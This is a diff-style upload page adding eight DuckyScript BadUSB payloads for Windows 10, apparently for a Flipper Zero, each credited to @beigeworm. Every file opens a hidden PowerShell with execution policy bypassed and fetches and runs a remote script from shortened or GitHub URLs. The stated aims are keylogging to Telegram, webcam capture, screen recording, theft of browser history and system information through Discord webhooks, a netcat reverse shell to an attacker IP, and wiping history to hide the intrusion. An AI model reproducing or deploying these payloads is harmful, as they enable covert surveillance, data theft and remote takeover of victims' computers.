Upload 8 files
Browse files- Browser-History-to-Discord (2).txt +19 -0
- Clean-History.txt +19 -0
- Keylogger-to-Telegram.txt +20 -0
- Record-Screen-to-Discord (2).txt +18 -0
- Simple-Netcat-Client.txt +20 -0
- System-Info-to-Discord (2).txt +19 -0
- System-Info-to-Telegram.txt +19 -0
- Webcam-to-Discord.txt +18 -0
Browser-History-to-Discord (2).txt
ADDED
@@ -0,0 +1,19 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
REM Title: beigeworm's browser history to Discord Webhook.
|
2 |
+
REM Author: @beigeworm
|
3 |
+
REM Description: This script collects browser history and posts results to a discord webhook.
|
4 |
+
REM Target: Windows 10
|
5 |
+
|
6 |
+
REM *SETUP*
|
7 |
+
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
|
8 |
+
|
9 |
+
REM some setup for dukie script
|
10 |
+
DEFAULT_DELAY 100
|
11 |
+
|
12 |
+
REM open powershell (remove "-W H" to show the window)
|
13 |
+
DELAY 1000
|
14 |
+
GUI r
|
15 |
+
DELAY 750
|
16 |
+
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_bh_to_dc | iex
|
17 |
+
ENTER
|
18 |
+
|
19 |
+
|
Clean-History.txt
ADDED
@@ -0,0 +1,19 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
REM Title: History Cleaner
|
2 |
+
REM Author: @beigeworm
|
3 |
+
REM Description: This script empties the temp folder and recycle bin, clear run box and powershell history
|
4 |
+
REM Target: Windows 10
|
5 |
+
|
6 |
+
REM *SETUP*
|
7 |
+
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
|
8 |
+
|
9 |
+
REM some setup for dukie script
|
10 |
+
DEFAULT_DELAY 100
|
11 |
+
|
12 |
+
REM open powershell (remove "-W H" to show the window)
|
13 |
+
DELAY 1000
|
14 |
+
GUI r
|
15 |
+
DELAY 750
|
16 |
+
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Clean-History/main.ps1 | iex
|
17 |
+
ENTER
|
18 |
+
|
19 |
+
|
Keylogger-to-Telegram.txt
ADDED
@@ -0,0 +1,20 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
|
2 |
+
REM Title: beigeworm's Keyloggger to Telegram Chat.
|
3 |
+
REM Author: @beigeworm
|
4 |
+
REM Description: This script logs all Keystrokes and posts results to a Telegram chat when the keyboard goes inactive for more than 10 secs.
|
5 |
+
REM Target: Windows 10
|
6 |
+
|
7 |
+
REM *SETUP*
|
8 |
+
REM replace TOKEN_HERE with your Telegram token.
|
9 |
+
|
10 |
+
REM some setup for dukie script
|
11 |
+
DEFAULT_DELAY 100
|
12 |
+
|
13 |
+
REM open powershell (remove "-W H" to show the window)
|
14 |
+
DELAY 1000
|
15 |
+
GUI r
|
16 |
+
DELAY 750
|
17 |
+
STRING powershell -NoP -Ep Bypass -W H -C $tg='TOKEN_HERE'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Telegram-Keylogger/main.ps1 | iex
|
18 |
+
ENTER
|
19 |
+
|
20 |
+
|
Record-Screen-to-Discord (2).txt
ADDED
@@ -0,0 +1,18 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
REM Title: Record Screen to Discord
|
2 |
+
REM Author: @beigeworm
|
3 |
+
REM Description: This script records the screen for a specified time to a mkv file, then sends the file to a discord webhook.
|
4 |
+
REM Target: Windows 10
|
5 |
+
|
6 |
+
REM Replace YOUR_WEBHOOK_HERE with your Discord webhook URL
|
7 |
+
|
8 |
+
REM some setup for dukie script
|
9 |
+
DEFAULT_DELAY 100
|
10 |
+
|
11 |
+
REM open powershell (remove "-W H" to show the window)
|
12 |
+
DELAY 1000
|
13 |
+
GUI r
|
14 |
+
DELAY 750
|
15 |
+
STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/bwscreendc | iex
|
16 |
+
ENTER
|
17 |
+
|
18 |
+
|
Simple-Netcat-Client.txt
ADDED
@@ -0,0 +1,20 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
|
2 |
+
REM Title: Beigeworm's Simple Netcat Client
|
3 |
+
REM Author: @beigeworm
|
4 |
+
REM Description: This script connects target computer with a netcat session to send powershell commands.
|
5 |
+
REM Target: Windows 10
|
6 |
+
|
7 |
+
REM *SETUP*
|
8 |
+
REM replace IP_HERE with your netcat attacker IP Address.
|
9 |
+
REM NOTE The PORT number is 4444
|
10 |
+
|
11 |
+
REM some setup for dukie script
|
12 |
+
DEFAULT_DELAY 100
|
13 |
+
|
14 |
+
REM open powershell (remove "-W H" to show the window)
|
15 |
+
DELAY 1000
|
16 |
+
GUI r
|
17 |
+
DELAY 750
|
18 |
+
STRING powershell -NoP -Ep Bypass -W H -C $ip='IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Netcat-Client/main.ps1 | iex
|
19 |
+
ENTER
|
20 |
+
|
System-Info-to-Discord (2).txt
ADDED
@@ -0,0 +1,19 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
|
2 |
+
REM Title: beigeworm's system information to discord webhook
|
3 |
+
REM Author: @beigeworm
|
4 |
+
REM Description: This script gathers system information and posts to a discord webhook address with the results.
|
5 |
+
REM Target: Windows 10
|
6 |
+
|
7 |
+
REM *SETUP*
|
8 |
+
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
|
9 |
+
|
10 |
+
REM some setup for dukie script
|
11 |
+
DEFAULT_DELAY 100
|
12 |
+
|
13 |
+
REM open powershell (remove "-W H" to show the window)
|
14 |
+
DELAY 1000
|
15 |
+
GUI r
|
16 |
+
DELAY 750
|
17 |
+
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_info_to_dc | iex
|
18 |
+
ENTER
|
19 |
+
|
System-Info-to-Telegram.txt
ADDED
@@ -0,0 +1,19 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
|
2 |
+
REM Title: beigeworm's system information to Telegram Bot
|
3 |
+
REM Author: @beigeworm
|
4 |
+
REM Description: This script gathers system information and posts to Telegram Bot Chat with the results.
|
5 |
+
REM Target: Windows 10
|
6 |
+
|
7 |
+
REM *SETUP*
|
8 |
+
REM replace BOT_TOKEN with your Telegram bot token.
|
9 |
+
|
10 |
+
REM some setup for dukie script
|
11 |
+
DEFAULT_DELAY 100
|
12 |
+
|
13 |
+
REM open powershell (remove "-W H" to show the window)
|
14 |
+
DELAY 1000
|
15 |
+
GUI r
|
16 |
+
DELAY 750
|
17 |
+
STRING powershell -NoP -Ep Bypass -W H -C $tg='BOT_TOKEN';$cid='CHAT_ID'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Telegram-Infostealer/main.ps1 | iex
|
18 |
+
ENTER
|
19 |
+
|
Webcam-to-Discord.txt
ADDED
@@ -0,0 +1,18 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
REM Title: Webcam to Discord
|
2 |
+
REM Author: @beigeworm
|
3 |
+
REM Description: download a webcam.dll file, find a webcam cand take a picture then send it to discord.
|
4 |
+
REM Target: Windows 10
|
5 |
+
|
6 |
+
REM Replace YOUR_WEBHOOK_HERE with your Discord webhook URL
|
7 |
+
|
8 |
+
REM some setup for dukie script
|
9 |
+
DEFAULT_DELAY 100
|
10 |
+
|
11 |
+
REM open powershell (remove "-W H" to show the window)
|
12 |
+
DELAY 1000
|
13 |
+
GUI r
|
14 |
+
DELAY 750
|
15 |
+
STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/bwcamtodc | iex
|
16 |
+
ENTER
|
17 |
+
|
18 |
+
|